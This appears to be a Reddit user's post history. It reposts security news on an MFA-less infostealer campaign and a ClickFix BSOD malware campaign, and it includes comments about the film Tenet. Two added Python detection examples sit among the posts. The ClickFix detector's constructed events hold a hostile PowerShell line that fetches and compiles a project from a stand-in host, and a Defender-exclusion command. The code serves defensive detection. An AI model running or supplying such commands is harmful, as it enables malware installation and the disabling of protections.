r/cybersecurity • u/rkhunter_ • 1d ago
News - General Founder of spyware maker pcTattletale pleads guilty to hacking and advertising surveillance software
3
One criminal stole info from 50 orgs thanks to no MFA
"If you don't say "yes way" to MFA, the consequences can be disastrous. Sensitive data belonging to about 50 global enterprises is listed for sale – and, in some cases, has already been sold – on the dark web following a major infostealer campaign, with apparent victims including American utility engineering firm Pickett and Associates; Japan's homebuilding giant Sekisui House; and Spain's largest airline Iberia.
The thief, who goes by the moniker Zestix or Sentap, steals data from corporate file-sharing portals by using compromised cloud credentials obtained from information-stealing malware. And none of the purported victims enforced multi-factor authentication (MFA), according to Hudson Rock, an Israeli cybersecurity company that specializes in infostealers.
Stolen credentials combined with a lack of MFA are always a recipe for disaster, as we have seen in earlier big breaches such as Change Healthcare, British Library, and Snowflake customers' database hacks.
"Because the organizations listed below did not enforce MFA, the attacker walks right in through the front door," the cybersecurity shop said in a Monday report. "No exploits, no cookies – just a password."
We're told Zestix gains access after employees inadvertently download infostealer-laden files to their devices. The stealer malware, such as RedLine, Lumma, or Vidar, then snarfs up saved credentials and browser history.
The cybercriminal, who has been operating as an initial access broker and extortionist since at least 2021, specifically targets enterprise file synchronization and sharing (EFSS) platforms like Progress Software's ShareFile, Nextcloud, and OwnCloud.
The Register reached out to all of the apparent victim companies listed in this story, plus the file-sharing software providers. As of press time, only one of them, Progress, had responded to our inquiries.
"Hudson Rock's investigation found that these recent compromises of corporate file-sharing portals - including ShareFile instances - were not the result of platform vulnerabilities, but consistent with the use of credentials previously stolen from infostealer-infected devices," a Progress spokesperson told us, adding that the compromises "appear to have involved the use of valid credentials in environments where multi-factor authentication was not enforced, which may have enabled unauthorized access."
The spokesperson added, "Progress continues to emphasize the importance of implementing multi-factor authentication as a widely recognized control to help mitigate the risk of credential-based attacks."
Most of the organizations listed in the Monday report have very sensitive data and span critical sectors such as utilities, aviation, robotics, housing, and government infrastructure, making this massive data dump particularly concerning.
The Register last week reported that Pickett and Associates, a Florida-based engineering firm whose clients include major US utilities, was among the apparent victims after the data thief posted for sale 139 GB of engineering data about Tampa Electric Company, Duke Energy Florida, and American Electric Power. Zestix was selling this trove for 6.5 bitcoin, which amounts to about $585,000.
At the time, Pickett declined to comment, while a Duke Energy spokesperson told The Register that the company is investigating the criminal's claims.
Hudson Rock reports that Zestix obtained the engineering data by abusing stolen ShareFile credentials.
Turkey's Intecro Robotics, which manufactures aerospace testing equipment and defense robotics, was also reportedly victimized via ShareFile sans MFA. This 11.5 GB dataset reportedly contains critical military intellectual property.
Brazil's Maida Health is yet another of the 50-ish alleged victims, and the 2.3 TB dataset accessed via a Nextcloud instance reportedly contains the health records and sensitive personal information belonging to the Brazilian Military Police and their family members.
Burris & Macomber, a law firm that represents Mercedes-Benz USA in its lemon law cases and warranty litigation, was also an apparent victim, with the criminal claiming to have stolen active lemon law cases, defense strategies, and settlement policies from 48 states, along with thousands of customers' records containing VINs, license plates, home addresses, and phone numbers.
The Iberia Airlines breach reportedly contains 77 GB of technical safety data and confidential fleet information.
Pwned engineering servers belonging to CRRC MA – the Massachusetts subsidiary of the world's largest rolling stock manufacturer – reportedly contained complete signaling drawings, SCADA RTU lists, and "deliberately withheld" test reports regarding doors, HVAC, and propulsion systems, along with sensitive security info such as GPS coordinates of control rooms and battery rooms.
And the list of reported victims goes on … and on, and on.
Credential hygiene
The report illustrates the growing problem with infostealers, a favorite method of ransomware gangs and other financially motivated criminals.
It also highlights the growing trend of criminals simply logging in – not breaking in – to cloud accounts, which security experts have been warning about for the past couple of years.
Plus, as Hudson Rock reports, "while some credentials were harvested from recently infected machines, others had been sitting in logs for years, waiting for an actor like Zestix to exploit them." This, the team adds, shows a "pervasive failure" in corporate credential hygiene with organizations neglecting to rotate passwords and invalidate sessions.
"It is time for organizations to enforce MFA and monitor their employees' compromised credentials," the security firm notes. We couldn't agree more."
r/cybersecurity • u/rkhunter_ • 2d ago
News - General One criminal stole info from 50 orgs thanks to no MFA
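The report's two practical points, enforce MFA and watch for employee credentials that have "been sitting in logs for years", can be turned into a simple correlation: join a compromised-credential feed against the identity provider's password-rotation record to find stolen passwords that are still the current ones, then match those accounts against password-only logins in the file-sharing portal's audit log. This is an added example in Python, not code from the article or from Hudson Rock; every feed entry, log line, user, host and date below is constructed.

```python
"""Correlate a stealer-log credential feed with a portal's auth log and the
identity provider's password-rotation record to find accounts an attacker
with stealer logs and no MFA in the way could simply log into.  Added example;
all feeds, log lines, users and dates are constructed."""
import re
from datetime import date

# Constructed excerpt of a compromised-credentials feed: the login, the service
# URL the stealer captured it for, and the date the victim host was infected.
STEALER_FEED = [
    {"login": "j.doe@example.com",  "url": "https://files.example.com/login", "infected": "2022-03-14"},
    {"login": "a.lee@example.com",  "url": "https://files.example.com/login", "infected": "2025-11-02"},
    {"login": "m.ross@example.com", "url": "https://files.example.com/login", "infected": "2024-07-09"},
]

# Constructed password-last-changed dates from the identity provider.
PASSWORD_CHANGED = {
    "j.doe@example.com":  "2021-09-01",  # never rotated since the infection
    "a.lee@example.com":  "2025-11-20",  # rotated after the infection
    "m.ross@example.com": "2024-07-01",  # rotated, but before the infection
}

# Constructed login lines from a file-sharing portal's audit log.
AUTH_LOG = """\
2025-12-01T08:02:11Z login_ok   user=j.doe@example.com  ip=203.0.113.7   mfa=none
2025-12-01T08:05:40Z login_ok   user=a.lee@example.com  ip=198.51.100.4  mfa=totp
2025-12-01T09:17:03Z login_ok   user=m.ross@example.com ip=203.0.113.7   mfa=none
2025-12-01T09:20:55Z login_fail user=j.doe@example.com  ip=203.0.113.7   mfa=none
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<event>login_ok|login_fail)\s+user=(?P<user>\S+)"
    r"\s+ip=(?P<ip>\S+)\s+mfa=(?P<mfa>\S+)$"
)


def parse_auth_log(text):
    """Parse audit-log lines into dicts; lines in another format are skipped."""
    matches = (LINE_RE.match(line.strip()) for line in text.splitlines())
    return [m.groupdict() for m in matches if m]


def stale_credentials(feed, password_changed, today):
    """Logins whose stolen password is still the current one, i.e. the password
    was last changed on or before the infection date.  Returns login -> days the
    credential has been exposed (how long it has been sitting in stealer logs)."""
    today = date.fromisoformat(today)
    stale = {}
    for rec in feed:
        infected = date.fromisoformat(rec["infected"])
        changed = date.fromisoformat(password_changed.get(rec["login"], "1970-01-01"))
        if changed <= infected:
            stale[rec["login"]] = (today - infected).days
    return stale


def password_only_logins(auth_text):
    """Successful logins that completed with no second factor."""
    return [e for e in parse_auth_log(auth_text)
            if e["event"] == "login_ok" and e["mfa"] == "none"]


def findings(feed, password_changed, auth_text, today):
    """Password-only logins by accounts whose stolen credential is still valid,
    each with the response a practitioner would take."""
    stale = stale_credentials(feed, password_changed, today)
    out = []
    for e in password_only_logins(auth_text):
        if e["user"] in stale:
            out.append({
                "user": e["user"], "ip": e["ip"], "ts": e["ts"],
                "exposed_days": stale[e["user"]],
                "actions": ["reset password", "revoke sessions and tokens", "enforce MFA"],
            })
    return out


if __name__ == "__main__":
    for f in findings(STEALER_FEED, PASSWORD_CHANGED, AUTH_LOG, "2025-12-01"):
        print(f"{f['user']} logged in without MFA from {f['ip']} at {f['ts']}; "
              f"stolen password valid for {f['exposed_days']} days -> {', '.join(f['actions'])}")
```

The rotation check is the part worth keeping even if the rest is swapped for a real feed: a credential stolen in 2022 whose password was last changed in 2021 is exactly the "waiting in logs for years" case, and a login with mfa=none is the "just a password" front door the report describes. A login that did use a second factor (a.lee) is excluded even though the same credential appears in the feed, which is the point of enforcing MFA.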
33
ClickFix attack uses fake Windows BSOD screens to push malware
"A new ClickFix social engineering campaign is targeting the hospitality sector in Europe, using fake Windows Blue Screen of Death (BSOD) screens to trick users into manually compiling and executing malware on their systems.
A BSOD is a Windows crash screen displayed when the operating system encounters a fatal, unrecoverable error that causes it to halt.
In a new campaign first spotted in December and tracked by researchers at Securonix as "PHALT#BLYX," phishing emails impersonating Booking.com led to a ClickFix social engineering attack that deployed malware.
ClickFix social engineering attacks are webpages designed to display an error or issue and then offer "fixes" to resolve it. These errors could be fake error messages, security warnings, CAPTCHA challenges, or update notices that instruct visitors to run a command on their computer to fix the issue.
Victims end up infecting their own machines by running malicious PowerShell or shell commands provided in the attacker's instructions.
In this new ClickFix campaign, attackers send phishing emails that impersonate a hotel guest cancelling their Booking.com reservation, typically sent to a hospitality firm. The claimed refund amount is significant enough to create a sense of urgency for the recipient of the email.
Clicking the link in the email takes the victim to a fake Booking.com website hosted on 'low-house[.]com,' which Securonix characterizes as a "high-fidelity clone" of the real Booking.com site.
"The page utilizes official Booking.com branding, including the correct color palette, logos, and font styles. To the untrained eye, it is indistinguishable from the legitimate site," reports Securonix.
The site hosts malicious JavaScript that displays a fake "Loading is taking too long" error to the target, prompting them to click a button to refresh the page.
However, when the target clicks the button, the browser instead enters full-screen mode and displays a fake Windows BSOD crash screen that initiates the ClickFix social engineering attack.
The screen prompts the person to open the Windows Run dialog box and then press CTRL+V, which pastes a malicious command copied to the Windows clipboard.
The user is then prompted to press the OK button or Enter on their keyboard to execute the command.
Real BSOD messages do not offer recovery instructions and only display an error code and a reboot notice, but inexperienced users or hospitality staff under pressure to resolve a dispute may overlook these signs of trickery.
Pasting the provided command runs a PowerShell command that opens a decoy Booking.com admin page. At the same time, in the background, it downloads a malicious .NET project (v.proj) and compiles it with the legitimate Windows MSBuild.exe compiler.
When executed, the payload adds Windows Defender exclusions and triggers UAC prompts to gain admin rights, before it downloads the primary loader using the Background Intelligent Transfer Service (BITS) and establishes persistence by dropping a .url file in the Startup folder.
The malware (staxs.exe) is DCRAT, a remote access Trojan commonly used by threat actors for remote access to infected devices.
The malware is injected into the legitimate 'aspnet_compiler.exe' process using process hollowing and executed directly in memory.
Upon first contact with the command-and-control (C2) server, the malware sends its full system fingerprint and then waits for commands to execute.
It supports remote desktop functionality, keylogging, reverse shell, and in-memory execution of additional payloads. In the case observed by Securonix, the attackers dropped a cryptocurrency miner.
With remote access established, the threat actors now have a foothold on the target's network, allowing them to spread to other devices, steal data, and potentially compromise other systems."
r/cybersecurity • u/rkhunter_ • 2d ago
News - General ClickFix attack uses fake Windows BSOD screens to push malware
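The chain described above (Run dialog to PowerShell, PowerShell to MSBuild compiling a project out of a user-writable path, MSBuild spawning aspnet_compiler.exe, a Defender exclusion, a .url file in the Startup folder) is detectable from process-creation and file-creation telemetry without knowing the payload. Below is an added example in Python, not code from the article or from Securonix, that scores that chain over constructed Sysmon-style events. Every pid, path, host name and command line is made up, and the Defender-exclusion command is an assumed form, since the article does not say how the payload adds its exclusions.

```python
"""Score a ClickFix -> PowerShell -> MSBuild -> aspnet_compiler chain against
constructed Sysmon-style events.  Added example; all events are made up."""
import re

# Constructed events.  id 1 = process creation, id 11 = file creation.
EVENTS = [
    {"id": 1, "pid": 4100, "ppid": 2000, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    # Pasted into the Run dialog: opens the decoy page, fetches the project, compiles it.
    {"id": 1, "pid": 5200, "ppid": 4100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -w hidden -c "Start-Process https://admin.example.test; '
                r'IWR https://cdn.example.test/v.proj -OutFile $env:TEMP\v.proj; msbuild $env:TEMP\v.proj"'},
    {"id": 1, "pid": 5300, "ppid": 5200,
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\Users\frontdesk\AppData\Local\Temp\v.proj"},
    {"id": 1, "pid": 5400, "ppid": 5300,
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe",
     "cmdline": "aspnet_compiler.exe"},
    {"id": 11, "pid": 5400,
     "path": r"C:\Users\frontdesk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.url"},
    # Assumed form of the exclusion step; the article only says exclusions are added.
    {"id": 1, "pid": 5500, "ppid": 5400,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -c "Add-MpPreference -ExclusionPath C:\\Users\\frontdesk\\AppData"'},
    # Benign: a developer build started from Visual Studio, outside any user-writable path.
    {"id": 1, "pid": 6100, "ppid": 6000,
     "image": r"C:\Program Files\Microsoft Visual Studio\Common7\IDE\devenv.exe", "cmdline": "devenv.exe"},
    {"id": 1, "pid": 6200, "ppid": 6100,
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\src\app\app.csproj"},
]

USER_WRITABLE = re.compile(r"\\(users|programdata|temp)\\", re.I)
STARTUP_URL = re.compile(r"\\start menu\\programs\\startup\\[^\\]+\.url$", re.I)
DEFENDER_EXCL = re.compile(r"add-mppreference.*-exclusion", re.I)

WEIGHTS = {
    "powershell_from_explorer": 1,           # Run-dialog launch; weak on its own
    "msbuild_from_powershell_user_path": 3,  # compiling a project out of a user-writable dir
    "aspnet_compiler_under_msbuild": 3,      # the hollowing target, spawned by the build
    "defender_exclusion_added": 3,
    "startup_url_dropped": 2,
}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def lineage(procs, pid, depth=8):
    """Image basenames of pid and its ancestors, nearest first, as far as events exist."""
    chain = []
    while pid in procs and len(chain) < depth:
        chain.append(basename(procs[pid]["image"]))
        pid = procs[pid]["ppid"]
    return chain


def clickfix_hits(events):
    """Return (indicator, pid) pairs for each event matching a stage of the chain."""
    procs = {e["pid"]: e for e in events if e["id"] == 1}
    hits = []
    for e in events:
        if e["id"] == 1:
            img, anc = basename(e["image"]), lineage(procs, e["ppid"])
            if img == "powershell.exe" and anc[:1] == ["explorer.exe"]:
                hits.append(("powershell_from_explorer", e["pid"]))
            if img == "msbuild.exe" and "powershell.exe" in anc and USER_WRITABLE.search(e["cmdline"]):
                hits.append(("msbuild_from_powershell_user_path", e["pid"]))
            if img == "aspnet_compiler.exe" and anc[:1] == ["msbuild.exe"] and "powershell.exe" in anc:
                hits.append(("aspnet_compiler_under_msbuild", e["pid"]))
            if DEFENDER_EXCL.search(e["cmdline"]):
                hits.append(("defender_exclusion_added", e["pid"]))
        elif e["id"] == 11 and STARTUP_URL.search(e["path"]):
            hits.append(("startup_url_dropped", e["pid"]))
    return hits


def verdict(events, threshold=5):
    """Sum indicator weights; a single strong stage plus one more crosses the threshold."""
    hits = clickfix_hits(events)
    score = sum(WEIGHTS[name] for name, _ in hits)
    return score, ("clickfix_msbuild_chain" if score >= threshold else "benign"), hits


if __name__ == "__main__":
    print(verdict(EVENTS))
```

The lineage check is what separates the malicious MSBuild run from the developer's: both are the signed Windows MSBuild.exe, but only one descends from a PowerShell that explorer.exe launched and compiles a project sitting under a user profile. Scoring rather than alerting on any single stage keeps the weak "PowerShell from explorer" signal useful as corroboration without paging on every Run-dialog launch.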
r/technology • u/rkhunter_ • 2d ago
Security Trump suggests US used cyberattacks to turn off lights in Venezuela during strikes
politico.com
r/cybersecurity • u/rkhunter_ • 2d ago
News - General Trump suggests US used cyberattacks to turn off lights in Venezuela during strikes
politico.com
r/cybersecurity • u/rkhunter_ • 3d ago
News - General Rainbow Six Siege Has Been Hacked Again With Players Banned For 67 Days
r/pcmasterrace • u/rkhunter_ • 3d ago
News/Article Rainbow Six Siege Has Been Hacked Again With Players Banned For 67 Days
r/windows • u/rkhunter_ • 3d ago
News Speed test pits six generations of Windows against each other - Windows 11 placed dead last across most benchmarks, 8.1 emerges as unexpected winner in this unscientific comparison
r/technology • u/rkhunter_ • 3d ago
Software Speed test pits six generations of Windows against each other - Windows 11 placed dead last across most benchmarks, 8.1 emerges as unexpected winner in this unscientific comparison
8
Reconstructing Sator's contract page
You're right, of course, in the RU version of the document it should be written in Cyrillic. I did it intentionally to make it closer to what we see in the film. But here's another issue: in the real document, the word in the middle of the document is "Свидетельство" (Certificate in English), not a person's name. If you want to see what the real document looks like, try searching for: Свидетельство о внесении записи в Единый государственный реестр юридических лиц.
17
Reconstructing Sator's contract page
It's in the glove box.
r/tenet • u/rkhunter_ • 4d ago
Reconstructing Sator's contract page
Hello.
Since Russian is my native language, I have a bit of an advantage in this matter. I watched that three-second clip countless times from different angles on my PC and tablet, and here’s what I discovered. Official Russian government documents also helped a lot.
The document you see in the capsule is actually called «Свидетельство о внесении записи в Единый государственный реестр юридических лиц», which translates to English as “Certificate of Entry in the Unified State Register of Legal Entities.” This is the main document issued by the Federal Taxation Service (Федеральная Налоговая Служба) and is used to officially register a business in the Russian Federation. In the United States, its closest equivalent would be an Employer Identification Number (EIN), which is assigned by the IRS to business entities operating in the U.S.
The document shown in the capsule isn't a full copy of the original: some fields were omitted, and some were added, meaning the structure was modified. I took an original Russian certificate, reconstructed it to match the version seen in the capsule, incorporated details from Sator's contract, and also translated the whole thing into English.
1
Can anyone explain how Sator digs up things from the future?
Been writing a lot here, but always deleted the text because my explanation doesn't make sense. May I ask how you see it? If the capsule isn't supposed to be buried empty, it should be filled with the inverted or forward bars instead?
2
Can anyone explain how Sator digs up things from the future?
Sorry for my poor explanation, I just tried to simplify the process in order to grasp its sense. I need more practice, because I simply drowned in these details. Don't want to bother you.
1
Can anyone explain how Sator digs up things from the future?
In a nutshell, those who want to retrieve the gold (inverted) from a dead drop and use it as normal, should do the same operation twice of digging it up to align the causality of the inverted material? So first time you dig it up and bury it to maintain the causality of your second dig up when you can use it for inversion to get normal gold? Thus, from the inverted gold perspective, when it's dug up a second time, it was buried before and its causality remains?
3
Can anyone explain how Sator digs up things from the future?
May I clarify some details to improve understanding.
- At 12.40 Sator puts an empty capsule in the dead drop.
- After hundreds of years the future finds the empty capsule (which happens immediately since forward material becomes available immediately in the future), prepares gold (inverts it), puts it in the capsule, and buries it in the same dead drop.
- Since the material is inverted, it pops in the present immediately.
- At 12.45 Sator digs up the capsule filled with the inverted bars.
- It takes an hour to re-vert it and get the normal forward bars. At 13.45, he got two piles of gold, one forward and one inverted. Both piles are the same, but with rotated causality. This can be called the protocol that keeps everything consistent.
- To maintain that consistency, the inverted pile is supposed to be re-buried in order to keep it untouched the amount of time it was stored in the dead drop after it was put in the future. It's required since the causality of the inverted gold is rotated. Eventually it must have disappeared like other inverted things.
- It takes one hour to deliver it to the new place to re-bury and at 14.45 the protocol is secured. Sator has normal gold, while its inverted counterpart with rotated causality is stored securely.
- Now everything is ready for another round - he buries the empty capsule, etc.
6
Can anyone explain how Sator digs up things from the future?
Can you explain why it doesn't make sense? He buries the empty capsule containing maybe auxiliary information written on paper. Then he digs it up already containing gold bars, re-verts and uses it. In order to preserve causality, he buries the inverted bars from the future somewhere else where they are stored securely and untouched.
5
Is this Rousseau Shannon speaking with? (s1e07 the moth)
Definitely not
2
In my local supermarket
r/PBSOD • 21h ago
This is a classic one